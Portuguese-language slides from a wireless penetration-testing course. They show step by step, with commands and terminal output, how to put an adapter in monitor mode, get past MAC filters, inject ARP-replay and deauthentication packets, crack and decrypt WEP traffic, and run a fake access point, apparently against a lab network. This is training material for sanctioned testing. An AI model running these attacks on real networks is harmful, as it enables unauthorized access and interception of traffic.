Escolha uma das opções e acesse esse e outros materiais sem bloqueio. 🤩
Cadastre-se ou realize login
Ao continuar, você aceita os Termos de Uso e Política de Privacidade
Escolha uma das opções e acesse esse e outros materiais sem bloqueio. 🤩
Cadastre-se ou realize login
Ao continuar, você aceita os Termos de Uso e Política de Privacidade
Escolha uma das opções e acesse esse e outros materiais sem bloqueio. 🤩
Cadastre-se ou realize login
Ao continuar, você aceita os Termos de Uso e Política de Privacidade
Escolha uma das opções e acesse esse e outros materiais sem bloqueio. 🤩
Cadastre-se ou realize login
Ao continuar, você aceita os Termos de Uso e Política de Privacidade
Escolha uma das opções e acesse esse e outros materiais sem bloqueio. 🤩
Cadastre-se ou realize login
Ao continuar, você aceita os Termos de Uso e Política de Privacidade
Escolha uma das opções e acesse esse e outros materiais sem bloqueio. 🤩
Cadastre-se ou realize login
Ao continuar, você aceita os Termos de Uso e Política de Privacidade
Escolha uma das opções e acesse esse e outros materiais sem bloqueio. 🤩
Cadastre-se ou realize login
Ao continuar, você aceita os Termos de Uso e Política de Privacidade
Escolha uma das opções e acesse esse e outros materiais sem bloqueio. 🤩
Cadastre-se ou realize login
Ao continuar, você aceita os Termos de Uso e Política de Privacidade
Escolha uma das opções e acesse esse e outros materiais sem bloqueio. 🤩
Cadastre-se ou realize login
Ao continuar, você aceita os Termos de Uso e Política de Privacidade
Escolha uma das opções e acesse esse e outros materiais sem bloqueio. 🤩
Cadastre-se ou realize login
Ao continuar, você aceita os Termos de Uso e Política de Privacidade
Prévia do material em texto
Teste
de
Invasão
em
Redes
Sem
Fio
Nelson Murilo
Clavis Segurança da Informação
$ whoami
• Consultor Infosec
• 2 livros publicados
• Pentester
• Investigador Forense
• Incident Handler
• Instrutor e Palestrante
Contatos
nmurilo@gmail.com
nelson.murilo
@nelsonmurilo
Modelo do Curso
• Aulas ao vivo (on line)
• Aulas gravadas para revisão
• Ambientes para testes
• Material complementar
• Avaliação
Agenda
• Introdução
• Conceitos de redes Wi-Fi
• Principais vulnerabilidades
• Ferramentas atuais
• Sondagem e mapeamento
• Identificação do ambiente
• Ataques
• Finalizando
Introdução
• Conceitos
• Características
§ Wi-Fi
§ Bluetooth
§ Infravermelho
§ WiMax
§ RFID
§ Celular (GSM/TDMA/CDMA, etc.)
§ ZigBee (802.15.4)
§ UWB (802.15.3)
Redes sem fio
IEEE 802.11
Padrões atuais:
802.11b 11Mb 2.4Ghz
802.11a 54Mb 5.1GHz
802.11g 54Mb 2.4Ghz
802.11i - Mecanismos de segurança
802.1x – Mecanismos de autenticação, uso em
redes cabeadas e sem fio
802.11n – Aumento da velocidade, 108Mb
nominais.
# dmesg | grep phy
[ 0.000000] BIOS-provided physical RAM map:
[ 84.913442] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht'
[ 84.913969] Registered led device: rt2800usb-phy0::radio
[ 84.913999] Registered led device: rt2800usb-phy0::assoc
[ 84.914026] Registered led device: rt2800usb-phy0::quality
# iwconfig
lo no wireless extensions.
wlan4 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
eth4 no wireless extensions.
Canais
Canais
Canais
Canais
Channel
36
:
5.18
GHz
Channel
40
:
5.2
GHz
Channel
44
:
5.22
GHz
Channel
48
:
5.24
GHz
Channel
52
:
5.26
GHz
Channel
56
:
5.28
GHz
Channel
60
:
5.3
GHz
Channel
64
:
5.32
GHz
Channel
149
:
5.745
GHz
Channel
153
:
5.765
GHz
Channel
157
:
5.785
GHz
Channel
161
:
5.805
GHz
Channel
165
:
5.825
GHz
$
iwlist
wlan0
freq
wlan0
24
channels
in
total;
available
frequencies
:
Channel
01
:
2.412
GHz
Channel
02
:
2.417
GHz
Channel
03
:
2.422
GHz
Channel
04
:
2.427
GHz
Channel
05
:
2.432
GHz
Channel
06
:
2.437
GHz
Channel
07
:
2.442
GHz
Channel
08
:
2.447
GHz
Channel
09
:
2.452
GHz
Channel
10
:
2.457
GHz
Channel
11
:
2.462
GHz
Canais
Ad-Hoc
Infraestrutura
(((
Nome
da
rede
)))
Infraestrutura
(((
Nome
da
rede
)))
Infraestrutura
Infraestrutura
Infraestrutura
Infraestrutura
Infraestrutura
Infraestrutura
Divulgação do nome da rede
#
iwlist
wlan0
scan
|
egrep
"Address|ESSID"
[...]
Cell
05
-‐
Address:
7C:4F:B5:E4:CC:80
ESSID:"GVT-‐CC81"
Cell
06
-‐
Address:
00:07:40:4D:1A:5C
ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00"
Cell
07
-‐
Address:
6C:2E:85:F3:0C:8B
ESSID:"GVT-‐0C87"
Divulgação do nome da rede
23:05:16.386193
Beacon
()
[1.0
2.0
5.5
11.0
6.0
12.0
24.0
36.0
Mbit]
ESS
CH:
11
23:05:16.488612
Beacon
()
[1.0
2.0
5.5
11.0
6.0
12.0
24.0
36.0
Mbit]
ESS
CH:
11
23:05:17.321039
Beacon
(Homenet54)
[1.0
2.0
5.5
11.0
Mbit]
ESS
CH:
3
23:05:17.629271
Beacon
(Homenet54)
[1.0
2.0
5.5
11.0
Mbit]
ESS
CH:
3
Divulgação do nome da rede
09:15:42.216583 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:
00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown)
Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|
802.11]
09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown)
DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui
Unknown) Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0
18.0 Mbit][|802.11]
09:15:42.218638 314us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:
00:21:29:65:b8:45 (oui Unknown) SA:00:07:40:4d:1a:5c (oui Unknown)
Probe Response (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] CH: 11[|802.11]
00:07:40:4D:1A:5C
Divulgação do nome da rede
09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown)
DA:00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown)
Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|802.11]
Divulgação do nome da rede
WEP
WPA
WPA-PSK (Pre-shared Key)
WPA - Enterprise
RADIUS
WPA - Enterprise
RADIUS
/etc/password
/etc/raddb/users
Oracle/MySQL/etc
Cer_ficado
Digital
Biometria
Conceitos iniciais
$
/sbin/ifconfig
wlan0
wlan0
Link
encap:Ethernet
HWaddr
00:21:29:65:b8:45
UP
BROADCAST
MULTICAST
MTU:1500
Metric:1
RX
packets:0
errors:0
dropped:0
overruns:0
frame:0
TX
packets:0
errors:0
dropped:0
overruns:0
carrier:0collisions:0
txqueuelen:1000
RX
bytes:0
(0.0
B)
TX
bytes:0
(0.0
B)
# tcpdump -vv -c 3 -i wlan0
tcpdump:
listening
on
wlan0,
link-‐type
EN10MB
(Ethernet),
capture
size
65535
bytes
14:00:37.291962
IP
(tos
0x0,
hl
64,
id
0,
offset
0,
flags
[DF],
proto
ICMP
(1),
length
84)
192.168.11.2
>
air:
ICMP
echo
request,
id
30507,
seq
9,
length
64
14:00:37.292417
IP
(tos
0x0,
hl
64,
id
8024,
offset
0,
flags
[DF],
proto
UDP
(17),
length
71)
192.168.11.2.49351
>
air:
[udp
sum
ok]
2302+
PTR?
1.11.168.192.in-‐addr.arpa.
(43)
14:00:37.294831
IP
(tos
0x0,
hl
255,
id
49706,
offset
0,
flags
[none],
proto
ICMP
(1),
length
84)
air
>
192.168.11.2:
ICMP
echo
reply,
id
30507,
seq
9,
length
64
3
packets
captured
Modo promiscuo
Modo promiscuo
#
iwconfig
wlan0
wlan0
IEEE
802.11bg
ESSID:off/any
Mode:Managed
Access
Point:
Not-‐Associated
Tx-‐Power=20
dBm
Retry
long
limit:7
RTS
thr:off
Fragment
thr:off
Encryp_on
key:off
Power
Management:on
#
iw
wlan0
info
Interface
wlan0
ifindex
32
type
managed
# iw dev wlan0 interface add mon0 type monitor
Modo Monitor
# iwconfig wlan0 mode monitor
Modo Monitor
# iwconfig mon0
mon0
IEEE
802.11bg
Mode:Monitor
Tx-‐Power=20
dBm
Retry
long
limit:7
RTS
thr:off
Fragment
thr:off
Power
Management:on
# iw mon0 info
Interface
mon0
ifindex
35
type
monitor
Modo monitor
# tcpdump -c 3 -i mon0 -vv
tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap
header), capture size 65535 bytes
14:22:52.234724 1.0 Mb/s 2412 MHz 11b -74dB signal antenna 1 [bit 14] 0us
Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH: 1,
PRIVACY[|802.11]
14:22:52.260469 1.0 Mb/s 2412 MHz 11b -48dB signal antenna 1 [bit 14] WEP
Encrypted 0us Data IV:5b5 Pad 20 KeyID 2
14:22:52.261938 54.0 Mb/s 2412 MHz 11g -18dB signal antenna 1 [bit 14] WEP
Encrypted 44us Data IV:4104 Pad 20 KeyID 0
3 packets captured
Seleção de canais
# iwconfig mon0 channel 11
# iwconfig mon0
mon0
IEEE
802.11bg
Mode:Monitor
Frequency:2.462
GHz
Tx-‐Power=20
dBm
Retry
long
limit:7
RTS
thr:off
Fragment
thr:off
Power
Management:on
Seleção de canais
# tcpdump -c 3 -i mon0 -vv
tcpdump: WARNING: mon0: no IPv4 address assigned
tcpdump: listening on mon0, link-type IEEE802_11_RADIO (802.11 plus radiotap
header),
capture size 65535 bytes
14:49:58.832316 1.0 Mb/s 2462 MHz 11b -62dB signal antenna 1 [bit 14] 0us
Beacon () [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11[|802.11]
14:49:58.847041 1.0 Mb/s 2462 MHz 11b -78dB signal antenna 1 [bit 14] 0us
Beacon (GVT-CC81) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[
|802.11]
14:49:58.866671 1.0 Mb/s 2462 MHz 11b -80dB signal antenna 1 [bit 14] 0us
Beacon (GVT-0C87) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[
|802.11]
3 packets captured
Identificação de APs
CH 5 ][ Elapsed: 0 s ][ 2012-03-07 14:39
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:25:9C:36:A0:9F -88 15 18 108 47 5 11e. OPN bsbca
BSSID STATION PWR Rate Lost Frames Probe
00:25:9C:36:A0:9F 00:0E:2E:EC:6B:05 -1 11 - 0 0 1
00:25:9C:36:A0:9F 00:0E:2E:45:F5:B3 -1 11 - 0 0 1
Identificação de APs
grep 00-25-9C /usr/local/etc/aircrack-ng/airodump-ng-oui.txt
00-25-9C (hex) Cisco-Linksys, LLC
BSSID PWR RXQ Beac
ons #Data, #/s CH MB ENC
CIPHER AUTH ESSID
00:25:9C:36:A0:9F -88 15
18 108 47 5 11e. OPN
bsbca
Identificação de APs
Análise do tráfego
tshark -r Kismet-20120309-04-23-25-1.pcapdump
6007 334.636502 Apple_67:a1:ef -> Broadcast ARP 114 Gratuitous ARP for 192.168.1.104 (Request)
6448 358.804988 192.168.1.191 -> 239.255.255.250 SSDP 487 NOTIFY * HTTP/1.1
9739 547.951220 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
9740 547.953352 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
10144 572.216034 192.168.1.103 -> 224.0.0.251 MDNS 645 Standard query response TXT, cache flush PTR
Identificação de APs
Análise do tráfego
iwconfig wlan5
wlan5 IEEE 802.11abgn ESSID:"bsbca"
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
iwconfig wlan5 essid bsbca
Filtro de MAC
Filtro de MAC
Filtro de MAC
Filtro de MAC
Filtro de MAC
OpenBSD/NetBSD
# wiconfig wi0 -m 00:00:00:00:00:01
Linux
# ifconfig ath0 hw ether 00:00:00:00:00:01
FreeBSD
# ifconfig xl3 ether 00:00:00:00:00:01
Mac
OSX
# ifconfig en0 ether 00:00:00:00:00:01
Filtro de MAC
Wired Equivalent Privacy
Wired Equivalent Privacy
• Protocolo
frágil
• Quebra
exige
captura
de
grande
número
de
pacotes
(+5mil)
• Ou
por
dicionário
• Várias
ferramentas
disponíveis
Wired Equivalent Privacy
Wired Equivalent Privacy
CH 11 ][ Elapsed: 0 s ][ 2012-02-20 11:06
BSSIDPWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:07:40:4D:1A:5C -39 0 3 17 8 11 54 WEP WEP LABVIRUS
BSSID STATION PWR Rate Lost Frames Probe
00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 -36 0 20 LABVIRUS
Wired Equivalent Privacy
logtypes=pcapdump,gpsxml,netxml,nehxt,alert
/usr/local/etc/kismet.conf
gps=true
preferredchannels=1,6,11
allowplugins=true
$
ls
-‐lh
Kismet*
-‐rw-‐r-‐-‐r-‐-‐
1
root
root
8.0M
2012-‐02-‐20
14:04
Kismet-‐20120220-‐13-‐47-‐37-‐1.pcapdump
hhp://blog.kismetwireless.net/
Suite
formada
de
vários
programas
•
Análise
de
tráfego
•
Quebra
de
chave
WEP
(vários
_pos
de
ataques)
•
Injeção
de
pacotes
•
Quebra
de
chave
WPA(2)-‐PSK
usando
dicionário
•
Criação
de
Access
Point
falso
Sequência
comum
• Airmon-‐ng:
Coloca
a
interface
em
modo
monitor
• Airodump-‐ng:
Visualização
e
captura
de
pacotes
•
Aircrack-‐ng:
Quebra
da
chave
WEP
# airmon-ng
Interface Chipset Driver
wlan5 Ralink RT2870/3070 rt2800usb - [phy48]
# airmon-ng
Interface Chipset Driver
wlan5 Ralink RT2870/3070 rt2800usb -
[phy48]
# airmon-ng start wlan5
Interface Chipset Driver
wlan2 Realtek RTL8187L rtl8187 - [phy51]
(monitor mode enabled on mon0)
# airmon-ng
Interface Chipset Driver
wlan5 Ralink RT2870/3070 rt2800usb - [phy48]
# airmon-ng start wlan5
Interface Chipset Driver
wlan2 Realtek RTL8187L rtl8187 - [phy51]
(monitor mode enabled on mon0)
# airmon-ng start wlan5 11
Interface Chipset Driver
wlan2 Realtek RTL8187L rtl8187 - [phy51]
(monitor mode enabled on mon0)
Airodump-‐ng
# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.
Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.
Airodump-‐ng
# airodump-ng mon0
CH 11 ][ Elapsed: 4 s ][ 2012-02-21 17:01
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:07:40:4D:1A:5C -41 1091 55109 0 0 11 54 WEP WEP LABVIRUS
BSSID STATION PWR Rate Lost Frames Probe
00:07:40:4D:1A:5C 00:21:29:65:B8:45 -127 0 - 1 3 9 LABVIRUS
Aircrack-‐ng
$ aircrack-ng labvirus-01.pcap
[00:00:05]
Tested
633
keys
(got
46103
IVs)
KB
depth
byte(vote)
0
2/
4
14(55552)
13(54528)
3C(53504)
98(53504)
24(53248)
1
2/
1
DE(54784)
92(54528)
06(52992)
7D(52736)
02(52480)
2
1/
3
82(56576)
18(54272)
45(53760)
CD(53504)
FC(53248)
3
1/
3
09(57600)
08(55808)
41(55040)
C9(54016)
8E(52992)
4
51/
4
A1(48640)
83(48384)
86(48384)
99(48384)
B2(48384)
KEY
FOUND!
[
6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX
]
(ASCII:
naoxxxxxxxx
)
Decrypted
correctly:
100%
Wired Equivalent Privacy
Wired Equivalent Privacy
Aireplay-‐ng
# aireplay-ng --test mon0
17:33:50 Trying broadcast probe requests...
17:33:50 Injection is working!
17:33:52 Found 1 AP
17:33:52 Trying directed probe requests...
17:33:52 00:25:9C:36:0A:EF - channel: 11 – LABVIRUS'
17:33:52 Ping (min/avg/max): 1.671ms/6.230ms/11.234ms Power: -28.73
17:33:52 30/30: 100%
Aireplay-‐ng
# aireplay-ng --arpreplay –h mac_cliente –e ESSID interface
# arp –an
#
# ping -c 1 192.16
8.11.1
PING 192.168.11.1
(192.168.11.1) 56(8
4) bytes of data.
64 bytes from 192.
168.11.1: icmp_seq
=1 ttl=255 time=54
.9 ms
--- 192.168.11.1 pin
g statistics ---
1 packets transmitt
ed, 1 received, 0% p
acket loss, time 0m
s
rtt min/avg/max/m
dev = 54.973/54.97
3/54.973/0.000 ms
# arp –an
(192.168.11.1) at 0
0:07:40:35:a1:18 [
ether] on wlan0
Aireplay-‐ng
CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS
BSSID STATION PWR Rate Lost Frames Probe
00:07:40:4D:1A:5C 00:21:29:65:B8:45 -14 36 -54 1 128 LABVIRUS
Aireplay-‐ng
CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS
BSSID STATION PWR Rate Lost Frames Probe
00:07:40:4D:1A:5C 00:21:29:65:B8:45 -14 36 -54 1 128 LABVIRUS
aireplay-ng --arpreplay -h 00:21:29:65:B8:45 -e LABVIRUS mon0
The interface MAC (00:26:5A:74:15:28) doesn't match the specified MAC (-h).ifconfig mon0 hw ether 00:21:29:65:B8:45
17:44:10 Waiting for beacon frame (ESSID: LABVIRUS) on channel 11
Found BSSID "00:07:40:4D:1A:5C" to given ESSID "LABVIRUS".
Saving ARP requests in replay_arp-0221-174410.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 67093 packets (got 9624 ARP requests and 14601 ACKs), sent 15934 packets...(500 pps)
Aireplay-‐ng
CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS
BSSID STATION PWR Rate Lost Frames Probe
00:07:40:4D:1A:5C 00:21:29:65:B8:45 -14 36 -54 1 128 LABVIRUS
aireplay-ng --arpreplay -h 00:21:29:65:B8:45 -e LABVIRUS mon0
The interface MAC (00:26:5A:74:15:28) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:21:29:65:B8:45
17:44:10 Waiting for beacon frame (ESSID: LABVIRUS) on channel 11
Found BSSID "00:07:40:4D:1A:5C" to given ESSID "LABVIRUS".
Saving ARP requests in replay_arp-0221-174410.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 67093 packets (got 9624 ARP requests and 14601 ACKs), sent 15934 packets...(500 pps)
CH 11 ][ Elapsed: 48 s ][ 2012-02-21 17:44 ][ Decloak: 00:07:40:4D:1A:5C
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:07:40:4D:1A:5C -38 100 353 14438 652 11 54 WEP WEP LABVIRUS
BSSID STATION PWR Rate Lost Frames Probe
00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 - 1 4042 28810 LABVIRUS
Aireplay-‐ng
# airmon-ng start wlan5 11
Interface Chipset Driver
wlan2 Realtek RTL8187L rtl8187 - [phy51]
(monitor mode enabled on mon0)
# airodump-ng -c 11 mon0
Aireplay-‐ng
• Esperar
uma
nova
conexão
• Forçar
uma
desconexão
aireplay-ng --deauth 100 –h MAC_CLIENTE –e ESSID mon0
ivstools-‐ng
Aircrack-ng 1.1 r2076
[00:00:02] Tested 132441 keys (got 2448 IVs)
KB depth byte(vote)
0 19/ 34 F7(3840) 05(3584) 1A(3584) 2B(3584) 32(3584)
1 43/ 1 E7(3328) 01(3072) 02(3072) 04(3072) 0B(3072)
2 42/ 2 BB(3328) 15(3072) 21(3072) 28(3072) 34(3072)
3 0/ 7 CB(5888) A7(4352) 0B(4096) 5E(4096) 93(4096)
4 8/ 47 FF(4096) 1B(3840) 2E(3840) 44(3840) 83(3840)
Failed. Next try with 5000 IVs.
Aircrack-ng 1.1 r2076
[00:00:03] Tested 163521 keys (got 7120 IVs)
KB depth byte(vote)
0 4/ 7 FE(9984) 18(9728) 29(9728) 7F(9728) B4(9728) F6(9728)
1 23/ 24 B5(8960) 27(8704) 37(8704) 4A(8704) 51(8704) 53(8704) 28)
2 44/ 2 FA(8448) 00(8192) 26(8192) 2B(8192) 3D(8192) 4C(8192) 8)
3 19/ 3 93(9216) 0B(8960) 11(8960) 12(8960) 1D(8960) 3F(8960) 84)
4 19/ 20 BE(8960) 0A(8704) 11(8704) 12(8704) 3E(8704) 52(8704) 8)
Failed. Next try with 10000 IVs.
ivstools-‐ng
ivstools-‐ng
for i in poucosivs-0*; do ivstools --convert $i $i.ivs ; done
Opening poucosivs-01.cap
Creating poucosivs-01.cap.ivs
Read 18995 packets.
Written 2448 IVs.
Opening poucosivs-03.cap
Creating poucosivs-03.cap.ivs
Read 551433 packets.
Written 30547 IVs.
Opening poucosivs-04.cap
Creating poucosivs-04.cap.ivs
Read 129917 packets.
Written 13092 IVs.
ivstools-‐ng
ivstools --merge *.ivs poucostotal.ivs
Creating poucostotal.ivs
Opening poucosivs-01.cap.ivs
334818 bytes written
Opening poucosivs-03.cap.ivs
4524402 bytes written
Opening poucosivs-04.cap.ivs
6319236 bytes written
# aircrack-ng poucosivs-01.cap poucosivs-02.cap poucosivs-03.cap poucosivs-04.cap
Opening poucosivs-01.cap
Opening poucosivs-02.cap
Opening poucosivs-03.cap
Opening poucosivs-04.cap
Read 689344 packets.
# BSSID ESSID Encryption
1 00:07:40:4D:1A:5C LABVIRUS WEP (40296 IVs)
ivstools-‐ng
# tcpdump -vvv -n -r labvirus-01.cap
16:24:28.546838 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11]
16:24:29.251394 104us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.251398 0us Acknowledgment RA:c8:bc:c8:20:38:5c
16:24:29.251910 0us Acknowledgment RA:00:1c:b3:af:ae:1e
16:24:29.259072 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259080 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.259586 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259594 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.396292 90us Request-To-Send TA:c8:bc:c8:20:38:5c
# tcpdump -vvv -n -r labvirus-01.cap
16:24:28.546838 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11]
16:24:29.251394 104us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.251398 0us Acknowledgment RA:c8:bc:c8:20:38:5c
16:24:29.251910 0us Acknowledgment RA:00:1c:b3:af:ae:1e
16:24:29.259072 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259080 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.259586 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259594 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.396292 90us Request-To-Send TA:c8:bc:c8:20:38:5c
# airdecap-ng -w 6E616FXXXXXXXXXX -e LABVIRUS labvirus-01.cap
Total number of packets read 298278
Total number of WEP data packets 162412
Total number of WPA data packets 0
Number of plaintext data packets 0
Number of decrypted WEP packets 108781
Number of corrupted WEP packets 0
Number of decrypted WPA packets 0
# tcpdump -vvv -n -r labvirus-01.cap
16:24:28.546838 0us Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11, PRIVACY[|802.11]
16:24:29.251394 104us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.251398 0us Acknowledgment RA:c8:bc:c8:20:38:5c
16:24:29.251910 0us Acknowledgment RA:00:1c:b3:af:ae:1e
16:24:29.259072 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259080 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.259586 90us Request-To-Send TA:c8:bc:c8:20:38:5c
16:24:29.259594 46us Clear-To-Send RA:c8:bc:c8:20:38:5c
16:24:29.396292 90us Request-To-Send TA:c8:bc:c8:20:38:5c
# airdecap-ng -w 6E616FXXXXXXXXXX -e LABVIRUS labvirus-01.cap
Total number of packets read 298278
Total number of WEP data packets 162412
Total number of WPA data packets 0
Number of plaintext data packets 0
Number of decrypted WEP packets 108781
Numberof corrupted WEP packets 0
Number of decrypted WPA packets 0
16:24:43.166932 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.170518 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 335
16:24:43.173590 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 327
16:24:43.176662 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.181784 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 311
16:24:43.187416 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 343
16:24:43.190486 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 272
16:24:43.193558 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:24:43.197654 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 337
16:24:43.201748 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 325
16:24:43.204822 IP 192.168.11.1.1900 > 239.255.255.250.1900: UDP, length 331
16:25:05.057281 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:2
9:65:b8:45 (oui Unknown), length 300
16:25:05.060444 IP 192.168.11.1.bootps > 192.168.11.2.bootpc: BOOTP/DHCP, Reply, length 300
16:25:05.075290 IP 0.0.0.0.bootpc > 255.255.255.255.bootps: BOOTP/DHCP, Request from 00:21:2
9:65:b8:45 (oui Unknown), length 300
CH
11
][
Elapsed:
4
s
][
2012-‐02-‐27
21:14
BSSID
PWR
Beacons
#Data,
#/s
CH
MB
ENC
CIPHER
AUTH
ESSID
2E:74:C2:BA:A5:8A
-‐87
2
0
0
3
54e
WPA2
CCMP
PSK
iPhone
de
Marcelo
00:25:9C:36:0A:EF
-‐45
3
0
0
1
54
WPA2
CCMP
PSK
Homenet54
BSSID
STATION
PWR
Rate
Lost
Frames
Probe
(not
associated)
00:1B:77:7C:2C:A7
-‐86
0
-‐
1
68
8
Notebook
(not
associated)
00:21:29:65:B8:45
-‐47
0
-‐
1
7
2
LABVIRUS
Wired Equivalent Privacy
CH 4 ][ Elapsed: 28 s ][ 2012-02-28 07:59
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:26:CB:11:5F:30 -64 16 0 0 11 54e. WPA2 CCMP MGT 88200W
00:1C:10:AE:B6:8F -68 20 0 0 6 54 OPN linksys
74:EA:3A:CF:13:7C -70 15 2 0 11 54 . WPA2 CCMP PSK LABVIRUS
00:E0:FC:4D:27:49 -79 0 0 0 11 54 WPA2 TKIP PSK Pessoal
BSSID STATION PWR Rate Lost Frames Probe
(not associated) DC:2B:61:33:2B:6C -53 0 - 1 0 12 Boingo Hotspot,EuroYouthHotel,hostalparis3,RYANS-PARADIS-W
Wired Equivalent Privacy
Wired Equivalent Privacy
# airbase-ng -N --essid LABVIRUS -c 1 -v -W 1 mon0
09:57:07 Created tap interface at0
09:57:07 Trying to set MTU on at0 to 1500
09:57:07 Access Point with BSSID 00:21:29:65:B8:45 started.
09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09 Got broadcast probe request from 34:15:9E:E3:97:A7
09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS"
09:57:09 Got directed probe request from E0:F8:47:C3:30:14 - "LABVIRUS”
09:57:10 Got an auth request from E0:F8:47:C3:30:14 (shared key)
09:57:10 Broken SKA: E0:F8:47:C3:30:14 (expected: 151, got 32 bytes)
09:57:10 SKA from E0:F8:47:C3:30:14
09:57:10 Client E0:F8:47:C3:30:14 associated (WEP) to ESSID: "LABVIRUS"
09:57:10 Ignored IPv6 packet.
09:57:10 Starting Hirte attack against E0:F8:47:C3:30:14 at 100 pps.
09:57:10 Added ARP packet to cfrag buffer.
Wired Equivalent Privacy
# airodump-ng --bssid 00:21:29:65:B8:45 -w cafe-latte -c 1 mon0
# aircrack-ng cafe-latte-01.cap
Aircrack-ng 1.1 r2076
[00:00:00] Tested 798 keys (got 38085 IVs)
KB depth byte(vote)
0 0/ 1 6E(56064) 15(45824) 3D(45312) AA(44800) 4A(44288)
1 0/ 9 61(53760) 44(46336) 98(45568) 0E(44800) C4(44800)
2 33/ 2 AE(41728) 18(41472) 6C(41472) 6F(41472) A1(41472)
3 7/ 3 F0(43776) 70(43264)B4(43264) 62(43008) 50(42752)
